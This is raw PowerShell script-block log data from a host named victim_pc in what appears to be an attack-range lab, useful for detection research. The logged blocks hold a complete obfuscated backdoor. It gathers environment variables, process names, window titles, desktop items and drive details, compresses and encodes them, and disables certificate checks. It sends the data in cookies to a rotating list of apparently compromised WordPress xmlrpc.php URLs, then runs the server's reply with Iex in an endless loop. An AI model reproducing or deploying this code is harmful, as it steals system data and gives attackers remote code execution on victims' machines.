4104152150x0253475Microsoft-Windows-PowerShell/Operationalvictim_pc.attack_range.local11{$truE}3bca0d6b-1dee-436a-a080-0c285eccb32b 4104152150x0253474Microsoft-Windows-PowerShell/Operationalvictim_pc.attack_range.local11{$_.naMe+"^"+$_.USed}562cd304-f493-4a64-a99c-39ea94dfa593 4104152150x0253473Microsoft-Windows-PowerShell/Operationalvictim_pc.attack_range.local11Set-Alias -Name gcls -Value Get-CimClass -Option ReadOnly, AllScope -ErrorAction SilentlyContinueeb97b566-6e2b-4ea0-bdee-af8e65b04220 4104152150x0253472Microsoft-Windows-PowerShell/Operationalvictim_pc.attack_range.local11Set-Alias -Name ncso -Value New-CimSessionOption -Option ReadOnly, AllScope -ErrorAction SilentlyContinuec8bc5c07-f558-4a88-89b8-3a05f8a02208 4104152150x0253471Microsoft-Windows-PowerShell/Operationalvictim_pc.attack_range.local11Set-Alias -Name gcms -Value Get-CimSession -Option ReadOnly, AllScope -ErrorAction SilentlyContinuef11889e5-2cf8-4239-913c-a5340bd867d7 4104152150x0253470Microsoft-Windows-PowerShell/Operationalvictim_pc.attack_range.local11Set-Alias -Name rcms -Value Remove-cimSession -Option ReadOnly, AllScope -ErrorAction SilentlyContinue52f48758-a0b2-4eab-a1df-2a6727895a71 4104152150x0253469Microsoft-Windows-PowerShell/Operationalvictim_pc.attack_range.local11Set-Alias -Name ncms -Value New-CimSession -Option ReadOnly, AllScope -ErrorAction SilentlyContinue79639a9c-8cdc-4437-8d11-7708a71817ca 4104152150x0253468Microsoft-Windows-PowerShell/Operationalvictim_pc.attack_range.local11Set-Alias -Name rcie -Value Register-CimIndicationEvent -Option ReadOnly, AllScope -ErrorAction SilentlyContinue3c904bb6-2d2a-4d2f-8b38-35a81812b39e 4104152150x0253467Microsoft-Windows-PowerShell/Operationalvictim_pc.attack_range.local11Set-Alias -Name gcai -Value Get-CimAssociatedInstance -Option ReadOnly, AllScope -ErrorAction SilentlyContinue90fa2e87-ad33-4867-9df1-507763452b43 4104152150x0253466Microsoft-Windows-PowerShell/Operationalvictim_pc.attack_range.local11Set-Alias -Name icim -Value Invoke-CimMethod -Option ReadOnly, AllScope -ErrorAction SilentlyContinue76e837d2-0f0d-48a0-b9b5-3b3c4a43f4ba 4104152150x0253465Microsoft-Windows-PowerShell/Operationalvictim_pc.attack_range.local11Set-Alias -Name rcim -Value Remove-cimInstance -Option ReadOnly, AllScope -ErrorAction SilentlyContinue1c45251d-38b2-49ae-baa6-c5df1abbc2d0 4104152150x0253464Microsoft-Windows-PowerShell/Operationalvictim_pc.attack_range.local11Set-Alias -Name ncim -Value New-CimInstance -Option ReadOnly, AllScope -ErrorAction SilentlyContinue192091a5-f0d6-409a-b3ca-703ca654b631 4104152150x0253463Microsoft-Windows-PowerShell/Operationalvictim_pc.attack_range.local11Set-Alias -Name scim -Value Set-CimInstance -Option ReadOnly, AllScope -ErrorAction SilentlyContinue4ca9866e-3f2c-4455-a9b1-62d52ec6030c 4104152150x0253462Microsoft-Windows-PowerShell/Operationalvictim_pc.attack_range.local11Set-Alias -Name gcim -Value Get-CimInstance -Option ReadOnly, AllScope -ErrorAction SilentlyContinue51b26ae2-99ba-4be6-a41a-5025daab4548 4104152150x0253461Microsoft-Windows-PowerShell/Operationalvictim_pc.attack_range.local11{$_.FREE -gt 50000}d0781983-fc0e-4bb6-8142-c07644e7facc 4104132150x0253460Microsoft-Windows-PowerShell/Operationalvictim_pc.attack_range.local11{if($_.($PcgF[4])){"0"+$_.($PcgF[5])}elseif($_.($PcgF[0])){"1"+$_.($PcgF[5])}elseif($_.($PcgF[6])){"2"+[Io.PatH]::gETfIleName($_.PatH)}elsE{"3"+$_.($PcgF[5])}}a1c62976-8399-4d75-b5cc-83f13b89e654 4104152150x0253459Microsoft-Windows-PowerShell/Operationalvictim_pc.attack_range.local11{$_.nAME+"^"+$_.maiNwIndoWTItlE}16319024-a657-4aa0-837b-70f6808ea477 4104152150x0253458Microsoft-Windows-PowerShell/Operationalvictim_pc.attack_range.local11{$_.MaInwINdOWtiTle}1a1a6806-c2a4-462d-b8cb-56a589d28cd4 4104152150x0253457Microsoft-Windows-PowerShell/Operationalvictim_pc.attack_range.local11{$_.namE}be5b8a2f-6c19-45b9-9257-b42ad5f97c80 4104152150x0253456Microsoft-Windows-PowerShell/Operationalvictim_pc.attack_range.local11function kElBR($KWblSl){$lZKYT = [sySTem.Io.MemorystrEAM]::neW();$oJFvs = [SYsTEM.Io.sTReaMwRITER]::NEw((New-ObJeCt systEm.Io.CoMPResSiOn.gZIpstream($lZKYT,[syStEm.IO.compRessiOn.cOMpResSIONmoDe]::COMPReSS)));$oJFvs.Write([striNg]::jOIn("|!",$KWblSl));$oJFvs.clOSE();[sYsTEm.ConveRt]::toBase64StRInG($lZKYT.TOaRRAy())}fb2848d7-a1f0-4105-9da5-4fe131e92763 4104152150x0253455Microsoft-Windows-PowerShell/Operationalvictim_pc.attack_range.local11{($_.name+"^"+$_.value)}116cc807-4785-4fda-acce-898fea8d38c3 4104152150x0253454Microsoft-Windows-PowerShell/Operationalvictim_pc.attack_range.local11{$_.value.Length -lt 99}c753b3ca-a53d-42c0-8e81-9192220a209f 4104152150x0253453Microsoft-Windows-PowerShell/Operationalvictim_pc.attack_range.local11function FGSz($LJaa){$QEgLajcB="98636B5A1A";function kElBR($KWblSl){$lZKYT = [sySTem.Io.MemorystrEAM]::neW();$oJFvs = [SYsTEM.Io.sTReaMwRITER]::NEw((New-ObJeCt systEm.Io.CoMPResSiOn.gZIpstream($lZKYT,[syStEm.IO.compRessiOn.cOMpResSIONmoDe]::COMPReSS)));$oJFvs.Write([striNg]::jOIn("|!",$KWblSl));$oJFvs.clOSE();[sYsTEm.ConveRt]::toBase64StRInG($lZKYT.TOaRRAy())}$PcgF = ("isFOldER|Shell.AppliCAtiON|NAMespaCe|itEMs|ISLink|NAmE|iSFiLeSYsTEm").split("|");$hJJxp=kElBR((dir env:|where{$_.value.Length -lt 99}|%{($_.name+"^"+$_.value)})+("OSWMI^"+(gwmi Win32_OperatingSystem).caption));$LKDJD=kElBR(GpS|SeLeCT naME -UniqUE|%{$_.namE});$tOaphc=kElBR(GPS|wHERE{$_.MaInwINdOWtiTle}|%{$_.nAME+"^"+$_.maiNwIndoWTItlE});$aVEQTEO=kElBR(((new-object -com ($PcgF[1])).($PcgF[2])(0)).($PcgF[3])()|%{if($_.($PcgF[4])){"0"+$_.($PcgF[5])}elseif($_.($PcgF[0])){"1"+$_.($PcgF[5])}elseif($_.($PcgF[6])){"2"+[Io.PatH]::gETfIleName($_.PatH)}elsE{"3"+$_.($PcgF[5])}});$gElW=kElBR(GdR|wHeRe{$_.FREE -gt 50000}|%{$_.naMe+"^"+$_.USed});[nET.SErVIcepOIntMaNAger]::SECURItYProTOCol = [nET.SECuRiTyPrOToColTYPe]::TlS12;[neT.seRvIcEpoIntmAnaGER]::SERvErCErtificAtevaLIDaTIonCAlLBack ={$truE};$xyfrO=[sySTEm.Net.wEbReQueSt]::Create($LJaa);$xyfrO.uSERagENT="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36";$xyfrO.KEEpAliVE=0;$xyfrO.hEAdeRs.Add("Cookie: $QEgLajcB=$hJJxp; $QEgLajcB`1=$LKDJD; $QEgLajcB`2=$tOaphc; $QEgLajcB`3=$aVEQTEO; $QEgLajcB`4=$gElW");$yASa=nEw-oBJEcT SyStem.IO.STreaMREADeR $xyfrO.GEtReSPONSE().getrESpOnsestrEam();$PEUHcM=($yASa.ReadToEnD()) -sPliT $QEgLajcB;IF($PEUHcM.COUnT -EQ 3){Iex($PEUHcM[1] -REpLACE "^","");}}06a30fe3-be24-4909-96c0-7146c5c61553 4104132150x0253452Microsoft-Windows-PowerShell/Operationalvictim_pc.attack_range.local11function FGSz($LJaa){$QEgLajcB="98636B5A1A";function kElBR($KWblSl){$lZKYT = [sySTem.Io.MemorystrEAM]::neW();$oJFvs = [SYsTEM.Io.sTReaMwRITER]::NEw((New-ObJeCt systEm.Io.CoMPResSiOn.gZIpstream($lZKYT,[syStEm.IO.compRessiOn.cOMpResSIONmoDe]::COMPReSS)));$oJFvs.Write([striNg]::jOIn("|!",$KWblSl));$oJFvs.clOSE();[sYsTEm.ConveRt]::toBase64StRInG($lZKYT.TOaRRAy())}$PcgF = ("isFOldER|Shell.AppliCAtiON|NAMespaCe|itEMs|ISLink|NAmE|iSFiLeSYsTEm").split("|");$hJJxp=kElBR((dir env:|where{$_.value.Length -lt 99}|%{($_.name+"^"+$_.value)})+("OSWMI^"+(gwmi Win32_OperatingSystem).caption));$LKDJD=kElBR(GpS|SeLeCT naME -UniqUE|%{$_.namE});$tOaphc=kElBR(GPS|wHERE{$_.MaInwINdOWtiTle}|%{$_.nAME+"^"+$_.maiNwIndoWTItlE});$aVEQTEO=kElBR(((new-object -com ($PcgF[1])).($PcgF[2])(0)).($PcgF[3])()|%{if($_.($PcgF[4])){"0"+$_.($PcgF[5])}elseif($_.($PcgF[0])){"1"+$_.($PcgF[5])}elseif($_.($PcgF[6])){"2"+[Io.PatH]::gETfIleName($_.PatH)}elsE{"3"+$_.($PcgF[5])}});$gElW=kElBR(GdR|wHeRe{$_.FREE -gt 50000}|%{$_.naMe+"^"+$_.USed});[nET.SErVIcepOIntMaNAger]::SECURItYProTOCol = [nET.SECuRiTyPrOToColTYPe]::TlS12;[neT.seRvIcEpoIntmAnaGER]::SERvErCErtificAtevaLIDaTIonCAlLBack ={$truE};$xyfrO=[sySTEm.Net.wEbReQueSt]::Create($LJaa);$xyfrO.uSERagENT="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36";$xyfrO.KEEpAliVE=0;$xyfrO.hEAdeRs.Add("Cookie: $QEgLajcB=$hJJxp; $QEgLajcB`1=$LKDJD; $QEgLajcB`2=$tOaphc; $QEgLajcB`3=$aVEQTEO; $QEgLajcB`4=$gElW");$yASa=nEw-oBJEcT SyStem.IO.STreaMREADeR $xyfrO.GEtReSPONSE().getrESpOnsestrEam();$PEUHcM=($yASa.ReadToEnD()) -sPliT $QEgLajcB;IF($PEUHcM.COUnT -EQ 3){Iex($PEUHcM[1] -REpLACE "^","");}}WhILE(1){Try{FGSz(@("https://lecannabiste.com/xmlrpc.php","https://sbehub.org/xmlrpc.php","https://dermanence.ch/xmlrpc.php","https://trinityinstitute.edu.au/xmlrpc.php","https://copehealthscholars.org/xmlrpc.php","https://nexaevergreen.com/xmlrpc.php","https://daveandhope.thejohanssons.net/xmlrpc.php","https://civpro.io/xmlrpc.php","https://israeli-companies.com/xmlrpc.php","https://readingsimplified.com/xmlrpc.php") | GET-rANdOM)}catCH{};SlEep -s 20}e582fa6a-4260-4d39-a5a2-a30b668b4074 4104152150x0253451Microsoft-Windows-PowerShell/Operationalvictim_pc.attack_range.local11prompt489a189f-8f81-4175-932b-32e2982817d7